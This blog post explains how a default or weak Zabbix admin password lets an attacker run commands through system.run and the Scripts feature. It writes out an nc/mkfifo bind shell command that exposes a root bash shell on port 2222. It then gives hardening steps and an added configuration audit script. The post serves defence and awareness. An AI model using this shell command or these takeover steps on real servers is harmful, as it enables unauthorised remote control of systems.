If your Zabbix Admin password is weak or still the default (Admin/zabbix), and an attacker guesses it, the Zabbix server offers no further resistance. The attacker can create "system.run[command,<mode>]" monitoring items to execute commands, and can even obtain a shell on the server, possibly with root privileges.
First, a word about "system.run[command,<mode>]": this monitoring item is built into the agent so that the Zabbix server can remotely execute arbitrary commands on the agent's machine. There are two ways to use it: set up a monitoring item, or call it directly with the zabbix_get command. Commands run with the privileges of the user the Zabbix agent was started as, which is very dangerous if you set the agent to run as root (AllowRoot=1) for convenience.
[Image: System.run.png]
Here is a scenario showing how an attacker who has the Zabbix admin password can obtain a shell on the server, or even root privileges:
The shell is opened with the Netcat (nc) command; on the RedHat/CentOS family, nc can be installed with yum.
Select "Administration" -> "Scripts" and create a script such as:
[Image: Shell.png]
For "Execute on" select Zabbix server, and in "Commands" enter:
mkfifo /tmp/tmp_fifo; cat /tmp/tmp_fifo | /bin/bash -i 2>&1 | nc -l 2222 > /tmp/tmp_fifo
This opens a shell and listens on port 2222.
Go to the "Dashboard", click on a host below, and a "Scripts" tab pops up; click the "Create shell" script created above and the command above is executed.
[Image: Host.png]
On the Zabbix server, you can see that port 2222 is now listening.
[Image: 2222.png]
Now we connect to the server's shell with nc from our own machine:
[Image: Shell1.png]
This shows that we have successfully obtained a shell on the Zabbix server, and with root permissions! This is because my Zabbix server was started as root.
Here is how to secure Zabbix to prevent this from happening:
1. Very important: the Zabbix login password must be complex; do not use the default or a weak password.
2. Do not run the Zabbix server or agent as root; do not set AllowRoot=1.
3. Forbid the agent from executing system.run; do not set EnableRemoteCommands=1.
4. Apply security patches regularly; if the system kernel is too old and vulnerable, even a shell as the zabbix user can still be escalated to root privileges.
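As an added example (not part of the original post), a small shell audit that checks an agent configuration file for the two settings named in points 2 and 3 and lists any Zabbix processes still running as root; the config files it reads are constructed samples, the real one is normally /etc/zabbix/zabbix_agentd.conf.

```shell
#!/bin/sh
# Added example (not from the original post): audit the Zabbix agent settings
# that points 2 and 3 of the hardening list refer to. Config paths here are
# constructed samples; the agent usually reads /etc/zabbix/zabbix_agentd.conf.

# Print the active value of a parameter. Commented "# Param=..." lines are
# ignored; if a parameter appears more than once, the last active line wins.
zbx_param() {
    # $1 = config file, $2 = parameter name as Zabbix spells it
    sed -n "s/^[[:space:]]*$2[[:space:]]*=[[:space:]]*//p" "$1" | tail -n 1
}
# Report the two dangerous settings. Exit status 0 = nothing found, 1 = found.
audit_agent_conf() {
    zbx_bad=0
    if [ "$(zbx_param "$1" AllowRoot)" = "1" ]; then
        echo "FINDING ($1): AllowRoot=1, system.run commands would run as root"
        zbx_bad=1
    fi
    if [ "$(zbx_param "$1" EnableRemoteCommands)" = "1" ]; then
        echo "FINDING ($1): EnableRemoteCommands=1, system.run[...] items accepted"
        zbx_bad=1
    fi
    return $zbx_bad
}
# Point 2 also covers the running processes: list any zabbix_server or
# zabbix_agentd process owned by root (empty output is the good case).
zbx_root_processes() {
    ps -eo user=,comm= | awk '$1 == "root" && $2 ~ /^zabbix_(server|agentd)$/'
}

# Constructed sample configs so the audit runs without a Zabbix install.
demo_dir=$(mktemp -d)
cat > "$demo_dir/weak.conf" <<'EOF'
Server=127.0.0.1
# EnableRemoteCommands=0
EnableRemoteCommands=1
AllowRoot=1
EOF
cat > "$demo_dir/hardened.conf" <<'EOF'
Server=127.0.0.1
# EnableRemoteCommands=0
# AllowRoot=0
EOF
for f in "$demo_dir/weak.conf" "$demo_dir/hardened.conf"; do
    if audit_agent_conf "$f"; then echo "OK ($f): no dangerous settings"; fi
done
command -v ps >/dev/null && zbx_root_processes
rm -r "$demo_dir"
```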
References
Sohu vulnerability case:
http://www.wooyun.org/bugs/wooyun-2013-023089
Netcat command:
http://www.oschina.net/translate/linux-netcat-command
This article comes from the "Start Linux blog"; please contact the author before reproducing it!
Zabbix security: executing commands and getting a shell after cracking a weak password